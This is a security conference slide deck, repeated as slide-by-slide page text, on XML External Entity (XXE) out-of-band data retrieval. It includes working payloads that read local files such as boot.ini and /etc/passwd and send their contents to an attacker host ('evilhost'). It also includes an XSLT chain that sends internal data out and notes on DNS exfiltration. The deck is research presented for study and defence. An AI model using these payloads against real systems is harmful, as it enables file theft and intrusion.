XML Out-Of-Band Data Retrieval

  Timur Yunusov
  Alexey Osipov
Who we are
• Timur Yunusov:
  – Web Application Security Researcher
  – International forum on practical security «Positive
    Hack Days» developer
• Alexey Osipov:
  – Attack prevention mechanisms Researcher
  – Security tools and Proof of Concepts developer
• SCADA StrangeLove team members
Agenda
•   XML Overview
•   XML eXternal Entities
•   Entities in attributes
•   Out-Of-Band attack
    – DTD
    – XSLT
• Summary
• Demos
• Questions
XML OVERVIEW
XML overview
• Very popular protocol lately
  – Serialization
  – SOA-architecture (REST, SOAP, OAuth)
  – Human-readable (at least intended to be)
• Many parsers/many options controlling
  behavior (over 9000)
• Many xml-extensions like XSLT, SOAP, XML
  schema
XML overview
• Many opportunities lead to many
  vulnerabilities:
  – Adobe (@agarri_fr, spasibo)
  – PostgreSQL (@d0znpp), PHP, Java



• Many hackers techniques
XML EXTERNAL ENTITY
XML entities
• Entities:
  – Predefined          & < %
  – General             <!ENTITY general “hello”>
  – Parameter           <!ENTITY % param “hello”>
• General and parameter entities may be:
  – Internal (defined in current DTD)
  – External (defined in external resource)
XXE impact
•   Local file reading
•   Intranet access
•   Host-scan/Port-scan
•   Remote Code Execution (not so often)
•   Denial of Service
XXE techniques
• XML data output (basic)
• Error-based XXE
  – DTD (invalid/values type definition)
  – Schema validation
• Blind techniques
  – XSD values bruteforce (@d0znpp)
Error based output
• Schema validation In Xerces
parser error : Invalid URI: :[file]
I/O warning : failed to load external entity"[file]“
parser error : DOCTYPE improperly terminated
Warning: *** [file] in *** on line 11
<!DOCTYPE html[
<!ENTITY % foo SYSTEM "file:///c:/boot.ini">
%foo;]>
XML constraints
• XML validity/well-formedness
  – WFC: No External Entity References … in attributes
  – WFC: No < in Attribute Values
  – WFC: PEs in Internal Subset
Parameter entities
      resolve/validation algorithm
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html [
<!ENTITY % internal SYSTEM "local_file.xml">
%internal;]> "Hello, World!"> ]>
<!ENTITY title
<html>&title;</html>

                 local_file.xml:
                 <!ENTITY title "Hello, World!">
XXE attacks restrictions
• XML parser reads only valid xml documents
  – No binary =(
  (http://www.w3.org/TR/REC-xml/#CharClasses)
  – Malformed first string (no encoding attribute)
    (Some parsers)
  – But we have wrappers!
• Resulting document should also be valid
  – No external entities in attributes
ENTITIES IN ATTRIBUTES
System entities restrictions
           bypass within attributes
Well-formed constraint:
   – No External Entity References
• So, this is not possible, right?
<!DOCTYPE root[
       <ENTITY internal SYSTEM "file:///etc/passwd">
]>
<root attrib="&internal;“/>
System entities restrictions
          bypass within attributes
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://evilhost/evil.xml">
%remote;
<!ENTITY internal '[boot loader] timeout ***'>
%param1; ]>
<root attrib="&internal;" />                   Evil.xml

 <!ENTITY % payload SYSTEM "file:///c:/boot.ini">
 <!ENTITY % param1 "<!ENTITY internal '%payload;'>">
Pattern validation
<xs:restriction base="xs:string">
 <xs:pattern value="&test;" />
</xs:restriction>
DEMO
OUT-OF-BAND ATTACK
XXE attacks restrictions
Server-side in general (except Adobe XXE SOP
bypass)
XXE OOB
XXE OOB
What other OOB communication techniques are
present?
DNS exfiltration via SQL Injection (@stamparm)
                             UTL_HTTP.REQUEST
                             xp_fileexist
                             Dblink
                             LOAD_FILE
XXE OOB
<?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE root SYSTEM
<!DOCTYPE root [
 “http://evilhost/xml.xml”>
<!ENTITY % remote SYSTEM "http://evilhost/evil.xml">
 <root>
   &trick;
%remote;
 </root>

<!ENTITY % trick SYSTEM 'http://evil/?%5Bboot%20'>
%int;
%trick;]>                                    Evil.xml
<!ENTITY % payl SYSTEM "file:///c:/boot.ini">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://evil/?%payl;'>">
XXE OOB

                 DTD
                 Parsing, SYSTEM
                 reading




           XML
Attacker           Server

                                   PROFIT!
Parsing restrictions
• Beside restrictions of all entities there are also
  new ones
• “PEReferences forbidden in internal subset”
  (c) XML Specification
  – So we should be able to read some external
    resource (local or remote)
  – Wrappers
Parsing restrictions
• Quotes are blocking definition of entities
  – One should try single/double quotes when
    defining entity
<!ENTITY % int "<!ENTITY &#37; trick ‘*file
content’+’>"
• Space/new line/other whitespace symbols
  should not appear in URI
  – Wrappers again =)
  – Or not even needed
Vectors
• Depending on parser features – lack of DTD
  validation in main document doesn’t mean
  lack of validation everywhere. Some possible
  clues:
  – External DTD or Internal DTD subset from external
    data
  – Parameter entities only
  – XSD Schema
  – XSLT template
Vectors
•   <!DOCTYPE root SYSTEM “…”>
•   <!ENTITY external PUBLIC “some_text” “…”>
•   <tag xsi:schemaLocation=“…”/>
•   <tag xsi:noNamespaceSchemaLocation=“…”/>
•   <xs:include schemaLocation=“…”>
•   <xs:import schemaLocation=“…”>
•   <?xml-stylesheet href=“…”?>
XSLT OOB
• Controlling XSLT transformation template we
  can access some data from sensitive host:
 <xsl:variable name="payload"
   select="document('http://sensitive_host/',/)"/>
 <xsl:variable name="combine"
   select="concat('http://evilhost/', $payload)"/>
 <xsl:variable name="result"
   select="document($combine)" />
XSLT OOB
• Depending on available features we can:
  – Get non-xml data using “unparsed-text” function
  – Enumerate services/hosts with “*-available”
    functions
  – With substring() we can craft such DNS
    hostname, that will let us obtain some sensitive
    data via malicious DNS request to our server
DEMO
Vectors

           WAT R U
XML        DOIN?

XML        STAHP!
SUMMARY
XXE OOB Profit
• Server-side
  – Send file content over DNS/HTTP/HTTPs/Smb?
  – Without error/data output
• Client-side products
  – Nobody has ever tried to hack oneself ;)
  – Lots of products…
Parsers diff – MS with System.XML
• Pros:
  – URL-encodes query string for OOB technique
  – Saves all line feeds in attributes
• Cons:
  – Can’t read XML files without encoding declaration
    (we can still read Web.config .NET)
  – No wrappers (except system-wide)
Parsers diff – Java Xerces
• Pros:
  – Can read directories!
  – Sends NTLM auth data
  – Different wrappers
• Cons:
  – Converts line feeds to spaces when inserting in
    attribute
  – Can’t read multiline files with OOB technique
Parsers diff – libxml (PHP)
• Pros
  – Wrappers! (expect://, data://)
     (http://www.slideshare.net/phdays/on-secure-
     application-of-php-wrappers)
  – Most liberal parsing ???
• Cons
  – Can’t read big files by default (>8Kb)
Parsers diff
                     MS System.XML       Java Xerces       Libxml (PHP)
External entity in                      Line feeds are
 attribute value          +          converted to spaces         +
     OOB
 read multiline           +                  –                   +
      OOB                                                  Option is often
  read big files          +                  +                enabled

 Directory listing        –                  +                   –
Validating schema
     location             –                  +                   –
DEMO
Tools
XXE OOB Exploitation Toolset for Automation
• DNS knocking
• Vectors set
• HTTP Server
Tools
Metasploit module (special thnx2 @vegoshin)
• Vector set and HTTP server provided to you in
  your MSF ;-)
DEMO
Conclusions

• General ruination? ;-)
• Toolset
• New ideas for new vectors and
  applications
Special greetz

• Arseniy Reutov
• Ilya Karpov
• Mihail Firstov
• Sergey Pavlov
• Vyacheslav Egoshin
Questions?

www.scadastrangelove.org
@GiftsUngiven
@a66at

More Related Content

PDF
SQL Joins and Query Optimization
PPTX
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
ODP
PPSX
JSON in Oracle 18c and 19c
PDF
DBD::SQLite
PPTX
BACKUP & RECOVERY IN DBMS
PPTX
FILE SYSTEM VS DBMS ppt.pptx
PDF
Oracle statistics by example
SQL Joins and Query Optimization
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
JSON in Oracle 18c and 19c
DBD::SQLite
BACKUP & RECOVERY IN DBMS
FILE SYSTEM VS DBMS ppt.pptx
Oracle statistics by example

What's hot (20)

PPTX
XXE: How to become a Jedi
PPTX
PPT
Efficient Database Design for Banking System
PDF
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...
PPTX
OWASP A4 XML External Entities (XXE)
PDF
Same Origin Method Execution (BlackHat EU2014)
PDF
Gareth hayes. non alphanumeric javascript-php and shared fuzzing
PDF
Partitions Performance with MySQL 5.1 and 5.5
PDF
Hash DoS Attack
PPTX
Xml dtd
PPTX
Protecting browsers’ secrets in a domain environment
PPTX
PL SQL Quiz | PL SQL Examples
PDF
Gremlin's Graph Traversal Machinery
PDF
Migr8.rb チュートリアル
PPTX
External to DA, the OS X Way
PPTX
Sticky Keys to the Kingdom
PDF
Odoo Code Hardening [Odoo Experience 2019]
PPTX
Building Your First App with MongoDB
PPTX
database language ppt.pptx
XXE: How to become a Jedi
Efficient Database Design for Banking System
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...
OWASP A4 XML External Entities (XXE)
Same Origin Method Execution (BlackHat EU2014)
Gareth hayes. non alphanumeric javascript-php and shared fuzzing
Partitions Performance with MySQL 5.1 and 5.5
Hash DoS Attack
Xml dtd
Protecting browsers’ secrets in a domain environment
PL SQL Quiz | PL SQL Examples
Gremlin's Graph Traversal Machinery
Migr8.rb チュートリアル
External to DA, the OS X Way
Sticky Keys to the Kingdom
Odoo Code Hardening [Odoo Experience 2019]
Building Your First App with MongoDB
database language ppt.pptx
Ad

Similar to Black Hat: XML Out-Of-Band Data Retrieval (20)

PDF
Introduction to libre « fulltext » technology
PPT
Attacks against Microsoft network web clients
PPTX
XML External Entity Null Meet 19_3_16.pptx
PPTX
Vulnerabilities in data processing levels
PPT
Simplify your integrations with Apache Camel
PDF
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
PDF
Hibernate ORM: Tips, Tricks, and Performance Techniques
PPTX
Vulnerabilities on Various Data Processing Levels
PDF
Advancing JavaScript with Libraries (Yahoo Tech Talk)
PDF
Advanced guide to develop ajax applications using dojo
PDF
Jinx - Malware 2.0
PDF
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
PPTX
Using existing language skillsets to create large-scale, cloud-based analytics
PDF
DSpace Under the Hood
PDF
Killing Shark-Riding Dinosaurs with ORM
PPTX
06.1 .Net memory management
PPTX
Attack monitoring using ElasticSearch Logstash and Kibana
PDF
Deep Dive: Alfresco Core Repository (... embedded in a micro-services style a...
 
PDF
Play Framework and Activator
PDF
Your backend architecture is what matters slideshare
Introduction to libre « fulltext » technology
Attacks against Microsoft network web clients
XML External Entity Null Meet 19_3_16.pptx
Vulnerabilities in data processing levels
Simplify your integrations with Apache Camel
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Hibernate ORM: Tips, Tricks, and Performance Techniques
Vulnerabilities on Various Data Processing Levels
Advancing JavaScript with Libraries (Yahoo Tech Talk)
Advanced guide to develop ajax applications using dojo
Jinx - Malware 2.0
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
Using existing language skillsets to create large-scale, cloud-based analytics
DSpace Under the Hood
Killing Shark-Riding Dinosaurs with ORM
06.1 .Net memory management
Attack monitoring using ElasticSearch Logstash and Kibana
Deep Dive: Alfresco Core Repository (... embedded in a micro-services style a...
 
Play Framework and Activator
Your backend architecture is what matters slideshare
Ad

More from qqlan (20)

PDF
D1 t1 t. yunusov k. nesterov - bootkit via sms
PDF
Kaspersky SAS SCADA in the Cloud
PPTX
Миссиоцентрический подход к кибербезопасности АСУ ТП
PDF
ABUSE THEIR CLOUDS. ОБЛАЧНЫЕ ВЫЧИСЛЕНИЯ ГЛАЗАМИ ПЕНТЕСТЕРА, ЮРИЙ ГОЛЬЦЕВ, СЕ...
PDF
Best of Positive Research 2013
PDF
Web-style Wireless IDS attacks, Sergey Gordeychik
PDF
G. Gritsai, A. Timorin, Y. Goltsev, R. Ilin, S. Gordeychik, and A. Karpin, “S...
PPTX
SCADA StrangeLove: Too Smart Grid in da Cloud [31c3]
PDF
Pt infosec - 2014 - импортозамещение
PPTX
SCADA StrangeLove Kaspersky SAS 2014 - LHC
PDF
Firebird Interbase Database engine hacks or rtfm
PDF
SCADA StrangeLove 2: We already know
PDF
Internet connected ICS/SCADA/PLC
PDF
SCADA deep inside:protocols and software architecture
PDF
Techniques of attacking ICS systems
PDF
Positive Technologies Application Inspector
PPTX
Database honeypot by design
PDF
Positive Technologies Application Inspector
PDF
ICS/SCADA/PLC Google/Shodanhq Cheat Sheet v2
PDF
Positive Technologies - S4 - Scada under x-rays
D1 t1 t. yunusov k. nesterov - bootkit via sms
Kaspersky SAS SCADA in the Cloud
Миссиоцентрический подход к кибербезопасности АСУ ТП
ABUSE THEIR CLOUDS. ОБЛАЧНЫЕ ВЫЧИСЛЕНИЯ ГЛАЗАМИ ПЕНТЕСТЕРА, ЮРИЙ ГОЛЬЦЕВ, СЕ...
Best of Positive Research 2013
Web-style Wireless IDS attacks, Sergey Gordeychik
G. Gritsai, A. Timorin, Y. Goltsev, R. Ilin, S. Gordeychik, and A. Karpin, “S...
SCADA StrangeLove: Too Smart Grid in da Cloud [31c3]
Pt infosec - 2014 - импортозамещение
SCADA StrangeLove Kaspersky SAS 2014 - LHC
Firebird Interbase Database engine hacks or rtfm
SCADA StrangeLove 2: We already know
Internet connected ICS/SCADA/PLC
SCADA deep inside:protocols and software architecture
Techniques of attacking ICS systems
Positive Technologies Application Inspector
Database honeypot by design
Positive Technologies Application Inspector
ICS/SCADA/PLC Google/Shodanhq Cheat Sheet v2
Positive Technologies - S4 - Scada under x-rays

Black Hat: XML Out-Of-Band Data Retrieval

  • 1. XML Out-Of-Band Data Retrieval Timur Yunusov Alexey Osipov
  • 2. Who we are • Timur Yunusov: – Web Application Security Researcher – International forum on practical security «Positive Hack Days» developer • Alexey Osipov: – Attack prevention mechanisms Researcher – Security tools and Proof of Concepts developer • SCADA StrangeLove team members
  • 3. Agenda • XML Overview • XML eXternal Entities • Entities in attributes • Out-Of-Band attack – DTD – XSLT • Summary • Demos • Questions
  • 5. XML overview • Very popular protocol lately – Serialization – SOA-architecture (REST, SOAP, OAuth) – Human-readable (at least intended to be) • Many parsers/many options controlling behavior (over 9000) • Many xml-extensions like XSLT, SOAP, XML schema
  • 6. XML overview • Many opportunities lead to many vulnerabilities: – Adobe (@agarri_fr, spasibo) – PostgreSQL (@d0znpp), PHP, Java • Many hackers techniques
  • 8. XML entities • Entities: – Predefined &amp; &lt; &#37; – General <!ENTITY general “hello”> – Parameter <!ENTITY % param “hello”> • General and parameter entities may be: – Internal (defined in current DTD) – External (defined in external resource)
  • 9. XXE impact • Local file reading • Intranet access • Host-scan/Port-scan • Remote Code Execution (not so often) • Denial of Service
  • 10. XXE techniques • XML data output (basic) • Error-based XXE – DTD (invalid/values type definition) – Schema validation • Blind techniques – XSD values bruteforce (@d0znpp)
  • 11. Error based output • Schema validation In Xerces parser error : Invalid URI: :[file] I/O warning : failed to load external entity"[file]“ parser error : DOCTYPE improperly terminated Warning: *** [file] in *** on line 11 <!DOCTYPE html[ <!ENTITY % foo SYSTEM "file:///c:/boot.ini"> %foo;]>
  • 12. XML constraints • XML validity/well-formedness – WFC: No External Entity References … in attributes – WFC: No < in Attribute Values – WFC: PEs in Internal Subset
  • 13. Parameter entities resolve/validation algorithm <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html [ <!ENTITY % internal SYSTEM "local_file.xml"> %internal;]> "Hello, World!"> ]> <!ENTITY title <html>&title;</html> local_file.xml: <!ENTITY title "Hello, World!">
  • 14. XXE attacks restrictions • XML parser reads only valid xml documents – No binary =( (http://www.w3.org/TR/REC-xml/#CharClasses) – Malformed first string (no encoding attribute) (Some parsers) – But we have wrappers! • Resulting document should also be valid – No external entities in attributes
  • 16. System entities restrictions bypass within attributes Well-formed constraint: – No External Entity References • So, this is not possible, right? <!DOCTYPE root[ <ENTITY internal SYSTEM "file:///etc/passwd"> ]> <root attrib="&internal;“/>
  • 17. System entities restrictions bypass within attributes <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://evilhost/evil.xml"> %remote; <!ENTITY internal '[boot loader] timeout ***'> %param1; ]> <root attrib="&internal;" /> Evil.xml <!ENTITY % payload SYSTEM "file:///c:/boot.ini"> <!ENTITY % param1 "<!ENTITY internal '%payload;'>">
  • 18. Pattern validation <xs:restriction base="xs:string"> <xs:pattern value="&test;" /> </xs:restriction>
  • 19. DEMO
  • 21. XXE attacks restrictions Server-side in general (except Adobe XXE SOP bypass)
  • 23. XXE OOB What other OOB communication techniques are present? DNS exfiltration via SQL Injection (@stamparm) UTL_HTTP.REQUEST xp_fileexist Dblink LOAD_FILE
  • 24. XXE OOB <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root SYSTEM <!DOCTYPE root [ “http://evilhost/xml.xml”> <!ENTITY % remote SYSTEM "http://evilhost/evil.xml"> <root> &trick; %remote; </root> <!ENTITY % trick SYSTEM 'http://evil/?%5Bboot%20'> %int; %trick;]> Evil.xml <!ENTITY % payl SYSTEM "file:///c:/boot.ini"> <!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://evil/?%payl;'>">
  • 25. XXE OOB DTD Parsing, SYSTEM reading XML Attacker Server PROFIT!
  • 26. Parsing restrictions • Beside restrictions of all entities there are also new ones • “PEReferences forbidden in internal subset” (c) XML Specification – So we should be able to read some external resource (local or remote) – Wrappers
  • 27. Parsing restrictions • Quotes are blocking definition of entities – One should try single/double quotes when defining entity <!ENTITY % int "<!ENTITY &#37; trick ‘*file content’+’>" • Space/new line/other whitespace symbols should not appear in URI – Wrappers again =) – Or not even needed
  • 28. Vectors • Depending on parser features – lack of DTD validation in main document doesn’t mean lack of validation everywhere. Some possible clues: – External DTD or Internal DTD subset from external data – Parameter entities only – XSD Schema – XSLT template
  • 29. Vectors • <!DOCTYPE root SYSTEM “…”> • <!ENTITY external PUBLIC “some_text” “…”> • <tag xsi:schemaLocation=“…”/> • <tag xsi:noNamespaceSchemaLocation=“…”/> • <xs:include schemaLocation=“…”> • <xs:import schemaLocation=“…”> • <?xml-stylesheet href=“…”?>
  • 30. XSLT OOB • Controlling XSLT transformation template we can access some data from sensitive host: <xsl:variable name="payload" select="document('http://sensitive_host/',/)"/> <xsl:variable name="combine" select="concat('http://evilhost/', $payload)"/> <xsl:variable name="result" select="document($combine)" />
  • 31. XSLT OOB • Depending on available features we can: – Get non-xml data using “unparsed-text” function – Enumerate services/hosts with “*-available” functions – With substring() we can craft such DNS hostname, that will let us obtain some sensitive data via malicious DNS request to our server
  • 32. DEMO
  • 33. Vectors WAT R U XML DOIN? XML STAHP!
  • 35. XXE OOB Profit • Server-side – Send file content over DNS/HTTP/HTTPs/Smb? – Without error/data output • Client-side products – Nobody has ever tried to hack oneself ;) – Lots of products…
  • 36. Parsers diff – MS with System.XML • Pros: – URL-encodes query string for OOB technique – Saves all line feeds in attributes • Cons: – Can’t read XML files without encoding declaration (we can still read Web.config .NET) – No wrappers (except system-wide)
  • 37. Parsers diff – Java Xerces • Pros: – Can read directories! – Sends NTLM auth data – Different wrappers • Cons: – Converts line feeds to spaces when inserting in attribute – Can’t read multiline files with OOB technique
  • 38. Parsers diff – libxml (PHP) • Pros – Wrappers! (expect://, data://) (http://www.slideshare.net/phdays/on-secure- application-of-php-wrappers) – Most liberal parsing ??? • Cons – Can’t read big files by default (>8Kb)
  • 39. Parsers diff MS System.XML Java Xerces Libxml (PHP) External entity in Line feeds are attribute value + converted to spaces + OOB read multiline + – + OOB Option is often read big files + + enabled Directory listing – + – Validating schema location – + –
  • 40. DEMO
  • 41. Tools XXE OOB Exploitation Toolset for Automation • DNS knocking • Vectors set • HTTP Server
  • 42. Tools Metasploit module (special thnx2 @vegoshin) • Vector set and HTTP server provided to you in your MSF ;-)
  • 43. DEMO
  • 44. Conclusions • General ruination? ;-) • Toolset • New ideas for new vectors and applications
  • 45. Special greetz • Arseniy Reutov • Ilya Karpov • Mihail Firstov • Sergey Pavlov • Vyacheslav Egoshin